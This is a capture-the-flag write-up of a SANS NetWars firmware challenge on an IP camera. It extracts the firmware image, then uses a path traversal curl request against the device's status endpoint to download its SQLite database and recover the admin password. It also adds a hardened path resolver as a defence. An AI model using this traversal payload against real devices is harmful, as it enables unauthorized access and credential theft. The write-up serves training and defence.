TikSight Surveillance (Firmware)

Challenge

  • Event: SANS NetWars — Firmware
  • Category: Firmware / IoT
  • Artifact: firmware.bin (TikSight IP camera) + a live web service

Writeup

Extracting the filesystem

The firmware image is carved with binwalk, recursively extracting the embedded filesystems and compressed blobs:

binwalk -Me firmware.bin

This yields a JFFS2 root filesystem. The device’s status file discloses the hardware model:

cat ./_firmware.bin.extracted/jffs2-root/root/app/src/status
--- Model: TikSight Pro
--- Model Identifier: DS-2CD2183G2-IU
--- Hardware UUID: 5FE4BAA6-432D-5992-BD92-53E0DC5470C7
--- OS Loader Version: 580~743

The model identifier disclosed in the status file is DS-2CD2183G2-IU.

From firmware to the live service

The accompanying web service exposes a status endpoint that reflects a file path back to the caller. Because the parameter isn’t constrained, it’s a textbook path traversal — walking out of the web root and back down into the application’s SQLite database:

curl -s 'http://<target>/test/status?elem=../../../../../../../app/instance/db.sqlite' \
  | base64 -d > db.sqlite
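The root cause is that the `elem` value is joined onto the web root with no containment check. The following is an added example, not code from the challenge or the TikSight firmware, contrasting an unconstrained join (the flaw above) with a hardened resolver that refuses any path leaving the web root; the web root path is an assumed constant.

```python
import os
from pathlib import Path
from typing import Optional

# Assumed web root for the demonstration; the device's real layout is not known
WEB_ROOT = Path("/srv/tiksight/web")


def vulnerable_resolve(elem: str) -> Path:
    """Mirrors the flaw in the status endpoint: the already URL-decoded `elem`
    value is joined onto the web root with no constraint, so a run of '../'
    walks out of it and an absolute value replaces the root entirely."""
    return Path(os.path.normpath(os.path.join(WEB_ROOT, elem)))


def safe_resolve(elem: str) -> Optional[Path]:
    """Hardened form: normalise the joined path, then require the result to
    still sit inside WEB_ROOT. Returns None for anything that escapes, which
    covers '../' chains and absolute paths alike."""
    candidate = Path(os.path.normpath(os.path.join(WEB_ROOT, elem)))
    try:
        candidate.relative_to(WEB_ROOT)
    except ValueError:
        return None
    return candidate


def classify_request(elem: str) -> str:
    """Small helper for log review: label a requested `elem` value as
    'traversal' when the hardened resolver rejects it, else 'ok'."""
    return "ok" if safe_resolve(elem) is not None else "traversal"


if __name__ == "__main__":
    # Constructed sample of the payload shape used against the endpoint above
    payload = "../../../../../../../app/instance/db.sqlite"
    print("vulnerable:", vulnerable_resolve(payload))
    print("hardened:  ", safe_resolve(payload))
    print("legit:     ", safe_resolve("status/cam1.json"))
```

A reverse proxy or WAF in front of the camera can apply the same containment rule to `elem` before the request reaches the application, and the `classify_request` label is a convenient field to raise an alert on.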

Dumping the recovered database reveals the application’s credentials:

sqlite3 db.sqlite .dump
...
INSERT INTO users VALUES(1,'admin','TikSightSeesAll',...,1);

Admin credentials recovered: admin:TikSightSeesAll.